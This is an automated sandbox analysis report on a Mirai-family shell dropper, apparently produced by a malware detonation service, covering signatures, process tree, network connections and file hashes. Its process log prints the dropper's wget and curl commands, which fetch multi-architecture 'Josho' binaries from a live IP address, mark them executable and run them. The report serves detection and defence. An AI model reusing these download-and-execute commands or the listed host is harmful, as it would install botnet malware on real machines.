Analysis Overview
SHA256
09ae6fb139fb48daf4a6fb4c6754a040367836054ed902f19211806696470cc9
Threat Level: Known bad
The file 8UsA.sh was found to be: Known bad.
Malicious Activity Summary
Mirai
Executes dropped EXE
Modifies Watchdog functionality
Changes its process name
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-27 17:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-27 17:59
Reported
2024-04-27 18:02
Platform
ubuntu1804-amd64-20240226-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /tmp/Josho.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.arm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3AvA | /tmp/8UsA.sh | N/A |
| File opened for modification | /tmp/Josho.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.arm5 | /usr/bin/curl | N/A |
Processes
/tmp/8UsA.sh
[/tmp/8UsA.sh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.x86]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.x86]
/bin/cat
[cat Josho.x86]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.mips]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.mips]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.mpsl]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.mpsl]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.arm4]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.arm4]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.arm5]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.arm5]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.arm6]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.arm6]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.arm7]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.arm7]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.ppc]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.ppc]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.m68k]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.m68k]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.sh4]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.sh4]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.sh4 Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 151.101.130.49:443 | | tcp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 151.101.194.49:443 | cdn.fwupd.org | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 89.187.167.5:443 | | tcp |
| BR | 209.14.69.249:666 | | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | | tcp |
| BR | 209.14.69.249:666 | | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | | tcp |
Files
/tmp/Josho.x86
| Algorithm | Digest |
| --- | --- |
| MD5 | a648e3916f191a59f47d07a49702d0eb |
| SHA1 | 1d9280fd392858f5dbe61aea4cfa2453ade97442 |
| SHA256 | 0a82c84b8564ae5a178e3e8f6fc4550885055043928ee667e59efb035f9ccfc3 |
| SHA512 | 73ef7ce042d0d165c327acd50e984a08b3d8450fb8821c8ef390a8dc02044128836ba7590bd035a072a9b7a4c94defed1256e85b03887788fa998e5648b5e587 |